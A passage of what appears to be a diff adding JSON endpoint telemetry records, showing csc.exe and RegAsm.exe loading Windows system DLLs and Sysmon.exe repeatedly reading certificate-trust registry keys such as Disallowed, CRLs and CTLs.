"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": 
"C:\\Windows\\SysWOW64\\win32u.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": 
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "psapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\psapi.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862460000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862460000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, 
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 